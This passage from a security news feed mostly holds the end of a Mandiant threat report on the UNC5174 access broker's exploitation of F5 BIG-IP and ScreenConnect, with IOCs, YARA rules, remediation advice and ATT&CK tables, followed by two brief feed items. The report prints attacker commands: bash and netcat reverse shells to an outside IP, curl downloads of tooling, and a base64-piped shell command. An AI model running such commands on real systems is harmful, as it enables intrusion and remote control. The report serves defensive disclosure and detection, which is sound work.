<p>Mandiant observed evidence of UNC5174 issuing commands to connect bash and netcat TCP reverse shells back to the same infrastructure hosting GOREVERSE and SUPERSHELL payloads on port 443.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>Nov  2 07:16:15 localhost.localdomain notice icrd_child[18778]: 
01420002:5: AUDIT - pid=18778 user=admin folder=
/Common module=(tmos)# status=[Command OK] cmd_data=run util 
bash -c "bash -i /dev/tcp/172.104.124[.]74/443 0&gt;&amp;1 &amp;"|</code></pre>
<p><span>Table 4: UNC5174 command to download a bash web shell</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>Nov  2 07:30:37 localhost.localdomain notice icrd_child[18778]: 
01420002:5: AUDIT - pid=18778 user=admin folder=/Common 
module=(tmos)# status=[Command OK] cmd_data=run util bash 
-c "nc 172.104.124[.]74 443 -e /bin/bash &amp;"</code></pre>
<p><span>Table 5: UNC5174 command to download a netcat web shell</span></p></div>
<div class="block-paragraph_advanced"><h3>Internal Reconnaissance</h3>
<p>Shell command history artifacts on the compromised F5 appliance recorded evidence of the threat actor downloading the file "/tmp/ss" from the same infrastructure hosting GOREVERSE and SUPERSHELL payloads, as well as GitHub, using the cURL command.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>curl -o /tmp/ss hxxp://172.104.124[.]74/App-amd64linux-noupx</code></pre>
<pre class="language-plain"><code>curl -o /tmp/ss hxxps://github[.]com/1n7erface/Template/releases
/download/v1.2.5/App-amd64linux-noupx</code></pre>
<p><span>Table 6: UNC5174 command downloading unidentified additional tooling suspected of internal reconnaissance functionality</span></p></div>
<div class="block-paragraph_advanced"><p>The file "/tmp/ss" was not recoverable at the time of analysis; however, the GitHub URL resource https://github.com/1n7erface/Template hosts a likely related network scanning and reconnaissance tool with Chinese-language instructions. Execution of "/tmp/ss" was recorded in shell history, and command-line arguments indicate the tool was likely used to scan internal subnet ranges from the compromised F5 appliance using the tool <a href="https://github.com/shadow1ng/fscan" rel="noopener" target="_blank">FSCAN</a>.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>./ss -i &lt;Internal CIDR block&gt;</code></pre>
<p><span>Table 7: UNC5174 command to scan internal subnet ranges from compromised F5 appliances</span></p></div>
<div class="block-paragraph_advanced"><h3>GOHEAVY Tunneler: A Closer Look</h3>
<p>UNC5174 employs a Golang-based tunneler tool named GOHEAVY, obfuscated using GOBFUSCATE for added stealth. This tool leverages the Gin framework to manage traffic routing functionalities. Mandiant observed GOHEAVY engaging in simultaneous communication with an external C2 server operated by SUPERSHELL administrators while opening and listening on a vast number of local UDP ports. Interestingly, GOHEAVY continuously broadcasts the string "SpotUdp" to existing network interfaces.</p>
<p>This behavior suggests the tool's purpose lies in establishing covert communication channels and potentially facilitating lateral movement within compromised networks. The continuous "SpotUdp" broadcast might serve as a beacon for identifying other compromised machines running GOHEAVY within the same network</p>
<p>In addition to GOHEAVY, Mandiant observed the presence of various other tools common in red teaming, including:</p>
<ul>
<li>SLIVER client</li>
<li>FFUFP</li>
<li>SQLMAP</li>
<li>DIRBUSTER</li>
<li>METASPLOIT</li>
<li>AFROG penetration testing tool</li>
<li>NUCLEI vulnerability scanning templates</li>
</ul>
<h3>UNC5174 Closes the Door Behind Them</h3>
<p>Mandiant observed an unusual behavior by UNC5174 following their initial access on the compromised appliance. After backdoor accounts were configured, they attempted to self-patch the vulnerability using an F5-provided mitigation script "<a href="http://mitigation.sh/" rel="noopener" target="_blank"><u>mitigation.sh</u></a>". Mandiant assesses that this was an attempt to limit subsequent exploitation of the system by additional unrelated threat actors attempting to access the appliance. The additional commands were observed during their initial access on the compromised appliance:</p>
<ul>
<li>bash execution CVE-2023-46747 command run for account root6 from (HK) 61.239.68.73</li>
<li>28/10 14:16:23 deleted user root6</li>
<li>28/10 14:27:35: ran command cmd_data=run /util bash -c /root/mitigation.sh -u</li>
<li>4/11/2023 03:36:30 /tmp/.del</li>
</ul>
<h2>UNC5174 Targets ScreenConnect Vulnerability</h2>
<p>On Feb. 21, 2024, the actor "uteus" claimed in forum postings to have successfully exploited the vulnerability CVE-2024-1709 in ConnectWise ScreenConnect instances belonging to hundreds of organizations globally, primarily in the U.S. and Canada. </p>
<p>Mandiant obtained the output of the actor's exploit, which showed the actor added the admin user "cvetest" to ScreenConnect instances belonging to numerous organizations. Mandiant has observed other threat actors similarly adding admin accounts at multiple victim organizations.  Mandiant was also able to confirm the compromise of several ScreenConnect instances and the presence of unauthorized users added by the uteus persona tracked as UNC5174. Mandiant assesses with moderate confidence the other organizations listed by uteus were also compromised.</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/f5-connectwise-fig3.max-1000x1000.png" alt="Geographic distribution of UNC5174 ScreenConnect targeting">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="xi4hf">Figure 3: Geographic distribution of UNC5174 ScreenConnect targeting</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h2>Attribution</h2>
<p>Mandiant has identified a new access operations group UNC5174 that uses the personas "Uteus" (alternate spelling "uetus") on underground forums, which we assess with moderate confidence operates from China. UNC5174 was linked with several hacktivist collectives including "Dawn Calvary" and "Genesis Day" prior to 2023 and has also claimed to be affiliated with the PRC MSS as an access broker and possible contractor who conducts for profit intrusions.</p>
<h3>Chinese Hacktivists, UNC302, and UNC5174 Link to MSS Contractors</h3>
<p>Mandiant assesses UNC5174 (aka Uteus) was previously a member of Chinese hacktivist collectives "Dawn Calvary" and has collaborated with "Genesis Day" / "Xiaoqiying" and "Teng Snake." This individual appears to have departed these groups in mid-2023 and has since focused on executing access operations with the intention of brokering access to compromised environments.</p>
<p>As part of our investigation, Mandiant identified key details that suggest UNC5174 may be an initial access broker acting as an MSS contractor. The actor claimed MSS affiliation in dark web forums, claiming tacit backing of an unspecified MSS-related APT actor. Additionally, the impacted organizations targeted by UNC5174, including U.S. defense and UK government entities, were targeted concurrently by distinct known MSS access brokers UNC302, which were previously <a href="https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion" rel="noopener" target="_blank"><u>indicted</u></a> by the U.S. Department of Justice in 2020. </p>
<p>On Oct. 10, 2023, Mandiant identified event logs suggesting unconfirmed exploitation of an F5 device IP address of several government entities. This activity was associated with the UNC5174 pseudonym "Uteus", which shared this purported access to a U.S. military contractor and UK government organization in an online communication. The same IP address targeted through the previously described CVE-2023-46747 exploitation appeared in communications from this access broker, claiming successful exploitation of Confluence vulnerability CVE-2023-22515. Details of the intrusion were discovered within communications on a dark web forum. The Uteus persona indicated they had utilized a <a href="https://github.com/Chocapikk/CVE-2023-22515" rel="noopener" target="_blank"><u>public proof of concept</u></a> to perform activities on compromised systems. Notably, Uteus is believed to be distinct from the entity "Xiaoqiying," which has independently claimed to not be employed by the Chinese Government in a Telegram channel operated by the group.</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/f5-connectwise-fig4.max-1000x1000.png" alt="Telegram channel for Xiaoqiying claiming no employment with the Chinese government">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="xi4hf">Figure 4: Telegram channel for Xiaoqiying claiming no employment with the Chinese government</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p>Based on these findings, Mandiant assesses with moderate confidence that Uteus represents an initial access broker persona for UNC5174, used to sell obtained access to compromised systems. While definitive connections cannot be established at this time, Mandiant highlights that there are similarities between UNC5174 and UNC302, which suggests they operate within an MSS initial access broker landscape. These similarities suggest possible shared exploits and operational priorities between these threat actors, although further investigation is required for definitive attribution.</p>
<h2>Outlook and Implications</h2>
<p>UNC5174 exploitation of CVE-2023-46747 as a N-day vulnerability in tandem with recent exploitation of Connectwise ScreenConnect vulnerability CVE-2024-1709 demonstrates PRC-related threat actors' systematized approach to achieving access to targets of strategic or political interest to the PRC. China-nexus actors continue to conduct vulnerability research on widely deployed edge appliances like F5 BIG-IP and ScreenConnect to enable espionage operations at scale. These operations often include rapid exploitation of recently disclosed vulnerabilities using custom or publicly available proof-of-concept exploits. UNC5174 and UNC302 operate within this model, and their operations provide insight into the initial access broker ecosystem leveraged by the MSS to target strategically interesting global organizations. Mandiant believes that UNC5174 will continue to pose a threat to organizations in the academic, NGO, and government sectors specifically in the United States, Canada, Southeast Asia, Hong Kong, and the United Kingdom.</p>
<h2>Remediation and Hardening</h2>
<p>Mandiant recommends performing the following remediation and hardening actions on impacted F5 appliances:</p>
<ul>
<li>Restrict access to the F5 TMUI from the internet.</li>
<li>Immediately apply the F5 mitigation script published in [<a href="https://my.f5.com/manage/s/article/K000137353" rel="noopener" target="_blank"><u>K000137353</u></a>] to any vulnerable F5 appliances.</li>
<li>Investigate vulnerable F5 appliances for evidence of compromise.</li>
</ul>
<p>In the event of F5 compromise:</p>
<ul>
<li>Review appliance configurations for unauthorized modifications.</li>
<li>Review file system and operating system (OS) artifacts for evidence of privileged account creation and remove any unauthorized accounts.</li>
<li>Consider revoking and re-issuing sensitive cryptographic material such as certificates and private keys that may have been accessible to a threat actor.</li>
</ul>
<p>For impacted ScreenConnect instances, Mandiant recommends that organizations with an on-premises controller <a href="https://services.google.com/fh/files/misc/connectwise-screenconnect-remediation-hardening-guide.pdf" rel="noopener" target="_blank"><u>read our latest ScreenConnect remediation and hardening guide</u></a>.</p>
<h2>Indicators of Compromise (IOCs)</h2>
<h3>Network IOCs</h3></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>IP Address</strong></p>
</td>
<td>
<p><strong>ASN</strong></p>
</td>
<td>
<p><strong>NetBlock</strong></p>
</td>
<td>
<p><strong>Location</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>118.140.151[.]242 </span></p>
</td>
<td>
<p><span>9304</span></p>
</td>
<td>
<p><span>HGC Global Communications Limited</span></p>
</td>
<td>
<p><span>(HK)</span></p>
</td>
</tr>
<tr>
<td>
<p><span>61.239.68[.]73 </span></p>
</td>
<td>
<p><span>9269</span></p>
</td>
<td>
<p><span>Hong Kong Broadband Network Ltd.</span></p>
</td>
<td>
<p><span>(HK)</span></p>
</td>
</tr>
<tr>
<td>
<p><span>172.245.68[.]110</span></p>
</td>
<td>
<p><span>36352</span><a href="https://www.virustotal.com/gui/search/entity%253Aip%2520as_owner%253AAS-COLOCROSSING" rel="noopener" target="_blank"><span> </span></a></p>
</td>
<td>
<p><span>Colocrossing</span></p>
</td>
<td>
<p><span>(U.S.)</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h3>URLs</h3>
<div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>URL</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>http://172.245.68[.]110:8888 </span></p>
</td>
<td>
<p><span>SUPERSHELL C2</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h3>Host IOCs</h3>
<div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong><span>MD5 Hash</span></strong></p>
</td>
<td>
<p><strong><span>Filename</span></strong></p>
</td>
<td>
<p><strong><span>Type</span></strong></p>
</td>
<td>
<p><strong><span>Code Family</span></strong></p>
</td>
</tr>
<tr>
<td>
<p><span>c867881c56698f938b4e8edafe76a09b</span></p>
</td>
<td>
<p><span>LG</span></p>
</td>
<td>
<p><span>ELF</span></p>
</td>
<td>
<p><span>SNOWLIGHT</span></p>
</td>
</tr>
<tr>
<td>
<p><span>df4603548b10211f0aa77d0e9a172438</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
<td>
<p><span>ELF</span></p>
</td>
<td>
<p><span>SNOWLIGHT</span></p>
</td>
</tr>
<tr>
<td>
<p><span>0951109dd1be0d84a33d52c135ba9c97</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
<td>
<p><span>ELF</span></p>
</td>
<td>
<p><span>SNOWLIGHT</span></p>
</td>
</tr>
<tr>
<td>
<p><span>9c3bf506dd19c08c0ed3af9c1708a770</span></p>
</td>
<td>
<p><span>memfd:a</span></p>
</td>
<td>
<p><span>ELF</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
</tr>
<tr>
<td>
<p><span>0ba435460fb7622344eec28063274b8a</span></p>
</td>
<td>
<p><span>undefined</span></p>
</td>
<td>
<p><span>ELF</span></p>
</td>
<td>
<p><span>SNOWLIGHT</span></p>
</td>
</tr>
<tr>
<td>
<p><span>a78bf3d16349eba86719539ee8ef562d</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
<td>
<p><span>ELF</span></p>
</td>
<td>
<p><span>SNOWLIGHT</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h3>Host Based Indicators (Commands)</h3>
<pre class="language-plain"><code>cmd_data=run util bash -c "echo 
dG1zaCAtcSAtYyAnY2QgLztzaG93IHJ1bm5pbmctY29uZmlnIHJlY3Vyc2l2ZSc= 
| base64 -d | sh"  "tmsh -q -c 'cd /;show running-config recursive'"
run util bash -c "bash -i /dev/tcp/172.104.124.74/443 0&gt;&amp;1 &amp;"</code></pre></div>
<div class="block-paragraph_advanced"><h3>Detections</h3>
<pre class="language-plain"><code>rule M_Backdoor_GOREVERSE_2
{
        meta:
                author = "Mandiant"
                description = "This rule is designed to detect events related 
to goreverse. GOREVERSE is a publicly available reverse shell"
                md5 = "5c175ea3664279d6c0c2609844de6949"
                platforms = "Windows,Linux,MacOS"
                malware_family = "GOREVERSE"
        strings:
                $cc_main_fork_amd64 = { 41 81 39 74 72 75 65 75 ?? 48 8B 
[5] 48 8B [5] 48 8B [5] 4C 8B [5] 48 8B [5] 48 8B [5-10] E8 [4] 48 8B }
                $cc_print_help_amd64 = { 48 8D 15 [4] 48 89 94 24 [4-16] 48 
8B 1D [4] 48 8D 05 [4-24] BF 03 00 00 00 48 89 FE [0-12] E8 }
                $cc_rssh = "rssh" fullword
                $cc_validate_dest_len = { 48 83 3D [4] 00 [1-24] 49 83 FC 01 
[1-24] 49 C1 E4 05 [1-64] 83 3D [4] 00 }
                $str1 = "--[foreground|fingerprint|proxy|process_name] 
-d|--destination &lt;server_address&gt;"
                $str2 = "-d or --destination Server connect back address 
(can be baked in)"
                $str3 = "--foreground Causes the client to run without 
forking to background"
                $str4 = "--fingerprint Server public key SHA256 hex 
fingerprint for auth"
                $str5 = "--proxy Location of HTTP connect proxy to use"
                $str6 = "--process_name Process name shown in 
tasklist/process list"
        condition:
                ( ((uint32(0) == 0xcafebabe) or (uint32(0) == 0xfeedface) 
or (uint32(0) == 0xfeedfacf) or (uint32(0) == 0xbebafeca) or (uint32(0) 
== 0xcefaedfe) or (uint32(0) == 0xcffaedfe)) or (uint16(0) == 0x5a4d 
and uint32(uint32(0x3C)) == 0x00004550) or (uint32(0) == 0x464c457f)) 
and (all of ($str*) or all of ($cc_*))
}
</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APT_Downloader_SNOWLIGHT_1 
{
        meta:
                author = "Mandiant"
                description = "This rule is designed to detect 
the SNOWLIGHT code family"
                md5 = "0951109dd1be0d84a33d52c135ba9c97"
                platforms = "Linux"
                malware_family = "SNOWLIGHT"
        strings:
                $xor99 = { 80 31 99 48 FF C1 89 CE 29 EE 39 C6 
7C F2 48 63 D2 48 89 EE 44 89 E7 }
                $memfdcreate = { BA 01 00 00 00 BE 3B 0B 40 
00 BF 3F 01 00 00 E8 8C FE FF FF }	
        condition:
                uint32(0) == 0x464c457f and all of them
}
</code></pre></div>
<div class="block-paragraph_advanced"><h2>Mandiant Security Validation Actions</h2>
<p>Organizations can validate their security controls using the following actions with <a href="https://cloud.google.com/security/products/threat-intelligence" rel="noopener" target="_blank"><u>Mandiant Security Validation</u></a>.</p></div>
<div class="block-paragraph_advanced"><div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>VID</strong></p>
</td>
<td>
<p><strong>Name</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>A106-917</span></p>
</td>
<td>
<p><span>Application Vulnerability - F5 BIG-IP 17.1.0, CVE-2023-46747, Exploitation</span></p>
</td>
</tr>
<tr>
<td>
<p><span>A106-916</span></p>
</td>
<td>
<p><span>Application Vulnerability - F5 BIG-IP 17.1.0, CVE-2023-46747, User Authentication</span></p>
</td>
</tr>
<tr>
<td>
<p><span>A107-059</span></p>
</td>
<td>
<p><span>Application Vulnerability - CVE-2024-1708, Exploitation, Variant #1</span></p>
</td>
</tr>
<tr>
<td>
<p><span>A107-056</span></p>
</td>
<td>
<p><span>Application Vulnerability - CVE-2024-1709, Exploitation, Variant #1</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h2>MITRE ATT&amp;CK</h2>
<p>Mandiant has observed UNC5174 use the following techniques:</p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><span>Initial Access</span></p>
</td>
<td>
<p><span>T1190</span></p>
</td>
<td>
<p><span>Exploit Public-Facing Application</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Defense Evasion</span></p>
</td>
<td>
<p><span>T1027</span></p>
</td>
<td>
<p><span>Obfuscated Files or Information</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1070.004</span></p>
</td>
<td>
<p><span>File Deletion</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1140</span></p>
</td>
<td>
<p><span>Deobfuscate/Decode Files or Information</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1222.002</span></p>
</td>
<td>
<p><span>Linux and Mac File and Directory Permissions Modification</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1601.001</span></p>
</td>
<td>
<p><span>Patch System Image</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Discovery</span></p>
</td>
<td>
<p><span>T1016</span></p>
</td>
<td>
<p><span>System Network Configuration Discovery</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1049</span></p>
</td>
<td>
<p><span>System Network Connections Discovery</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1082</span></p>
</td>
<td>
<p><span>System Information Discovery</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1083</span></p>
</td>
<td>
<p><span>File and Directory Discovery</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Command and Control</span></p>
</td>
<td>
<p><span>T1095</span></p>
</td>
<td>
<p><span>Non-Application Layer Protocol</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1105</span></p>
</td>
<td>
<p><span>Ingress Tool Transfer</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1572</span></p>
</td>
<td>
<p><span>Protocol Tunneling</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1573.002</span></p>
</td>
<td>
<p><span>Asymmetric Cryptography</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Execution</span></p>
</td>
<td>
<p><span>T1059</span></p>
</td>
<td>
<p><span>Command and Scripting Interpreter</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1059.004</span></p>
</td>
<td>
<p><span>Unix Shell</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Persistence</span></p>
</td>
<td>
<p><span>T1136.001</span></p>
</td>
<td>
<p><span>Local Account</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Impact</span></p>
</td>
<td>
<p><span>T1531</span></p>
</td>
<td>
<p><span>Account Access Removal</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Credential Access</span></p>
</td>
<td>
<p><span>T1003.008</span></p>
</td>
<td>
<p><span>/etc/passwd and /etc/shadow</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Resource Development</span></p>
</td>
<td>
<p><span>T1608.003</span></p>
</td>
<td>
<p><span>Install Digital Certificate</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><br>Mandiant has observed UNC302 use the following techniques:<br><br></span></p>
<div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><span>Initial Access</span></p>
</td>
<td>
<p><span>T1133</span></p>
</td>
<td>
<p><span>External Remote Services</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1189</span></p>
</td>
<td>
<p><span>Drive-by Compromise</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1190</span></p>
</td>
<td>
<p><span>Exploit Public-Facing Application</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Collection</span></p>
</td>
<td>
<p><span>T1213</span></p>
</td>
<td>
<p><span>Data from Information Repositories</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1560</span></p>
</td>
<td>
<p><span>Archive Collected Data</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1560.001</span></p>
</td>
<td>
<p><span>Archive via Utility</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Persistence</span></p>
</td>
<td>
<p><span>T1505.003</span></p>
</td>
<td>
<p><span>Web Shell</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Defense Evasion</span></p>
</td>
<td>
<p><span>T1027</span></p>
</td>
<td>
<p><span>Obfuscated Files or Information</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1036</span></p>
</td>
<td>
<p><span>Masquerading</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1070.004</span></p>
</td>
<td>
<p><span>File Deletion</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1112</span></p>
</td>
<td>
<p><span>Modify Registry</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1134</span></p>
</td>
<td>
<p><span>Access Token Manipulation</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1497</span></p>
</td>
<td>
<p><span>Virtualization/Sandbox Evasion</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Impact</span></p>
</td>
<td>
<p><span>T1529</span></p>
</td>
<td>
<p><span>System Shutdown/Reboot</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Execution</span></p>
</td>
<td>
<p><span>T1059.003</span></p>
</td>
<td>
<p><span>Windows Command Shell</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1059.005</span></p>
</td>
<td>
<p><span>Visual Basic</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1203</span></p>
</td>
<td>
<p><span>Exploitation for Client Execution</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Discovery</span></p>
</td>
<td>
<p><span>T1012</span></p>
</td>
<td>
<p><span>Query Registry</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1016</span></p>
</td>
<td>
<p><span>System Network Configuration Discovery</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1057</span></p>
</td>
<td>
<p><span>Process Discovery</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1082</span></p>
</td>
<td>
<p><span>System Information Discovery</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1083</span></p>
</td>
<td>
<p><span>File and Directory Discovery</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1518</span></p>
</td>
<td>
<p><span>Software Discovery</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Credential Access</span></p>
</td>
<td>
<p><span>T1003</span></p>
</td>
<td>
<p><span>OS Credential Dumping</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Lateral Movement</span></p>
</td>
<td>
<p><span>T1021.001</span></p>
</td>
<td>
<p><span>Remote Desktop Protocol</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Resource Development</span></p>
</td>
<td>
<p><span>T1583.003</span></p>
</td>
<td>
<p><span>Virtual Private Server</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1584</span></p>
</td>
<td>
<p><span>Compromise Infrastructure</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Command and Control</span></p>
</td>
<td>
<p><span>T1071.001</span></p>
</td>
<td>
<p><span>Web Protocols</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1071.004</span></p>
</td>
<td>
<p><span>DNS</span></p>
</td>
</tr>
<tr>
<td> </td>
<td>
<p><span>T1095</span></p>
</td>
<td>
<p><span>Non-Application Layer Protocol</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI-Powered Penetration Testing with Metasploit]]></title>
<description><![CDATA[Overview This article documents an end-to-end agentic penetration test. Claude Desktop, connected to the Metasploit Framework through the Model Context Protocol (MCP), turns plain-English tasks
The post AI-Powered Penetration Testing with Metasploit appeared first on Hacking Articles.]]></description>
<link>https://tsecurity.de/de/3577611/hacking/ai-powered-penetration-testing-with-metasploit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3577611/hacking/ai-powered-penetration-testing-with-metasploit/</guid>
<pubDate>Sat, 06 Jun 2026 13:38:23 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Overview This article documents an end-to-end agentic penetration test. Claude Desktop, connected to the Metasploit Framework through the Model Context Protocol (MCP), turns plain-English tasks</p>
<p>The post <a href="https://www.hackingarticles.in/ai-powered-penetration-testing-with-metasploit/">AI-Powered Penetration Testing with Metasploit</a> appeared first on <a href="https://www.hackingarticles.in/">Hacking Articles</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Angreifer-Blick auf Netzwerke: Warum Zero-Days Patch-Zeitpläne entwerten]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – Zero-Days verschwinden nicht, und immer schnellere Exploit-Entwicklung macht starre Patch-Zeitpläne für viele Organisationen trügerisch. Stattdessen rückt die Frage in den Mittelpunkt, wie Angreifer nach einem erfolgreichen Einstieg durch Ihr Netzwerk weiterkommen. In dem W...]]></description>
<link>https://tsecurity.de/de/3576786/it-security-nachrichten/angreifer-blick-auf-netzwerke-warum-zero-days-patch-zeitplaene-entwerten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3576786/it-security-nachrichten/angreifer-blick-auf-netzwerke-warum-zero-days-patch-zeitplaene-entwerten/</guid>
<pubDate>Sat, 06 Jun 2026 01:50:05 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-attack-path-mapping-network.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-attack-path-mapping-network.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-attack-path-mapping-network-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-attack-path-mapping-network-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-attack-path-mapping-network-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-attack-path-mapping-network-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-attack-path-mapping-network-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – Zero-Days verschwinden nicht, und immer schnellere Exploit-Entwicklung macht starre Patch-Zeitpläne für viele Organisationen trügerisch. Stattdessen rückt die Frage in den Mittelpunkt, wie Angreifer nach einem erfolgreichen Einstieg durch Ihr Netzwerk weiterkommen. In dem Webinar von HD Moore, dem Mitbegründer von Metasploit und CEO von runZero, steht deshalb das „Attack-Path“-Denken im Vordergrund: […]</p>
<div><a href="https://www.it-boltwise.de/angreifer-blick-auf-netzwerke-warum-zero-days-patch-zeitplaene-entwerten.html">... den vollständigen Artikel <strong>»Angreifer-Blick auf Netzwerke: Warum Zero-Days Patch-Zeitpläne entwerten«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/angreifer-blick-auf-netzwerke-warum-zero-days-patch-zeitplaene-entwerten.html">Angreifer-Blick auf Netzwerke: Warum Zero-Days Patch-Zeitpläne entwerten</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
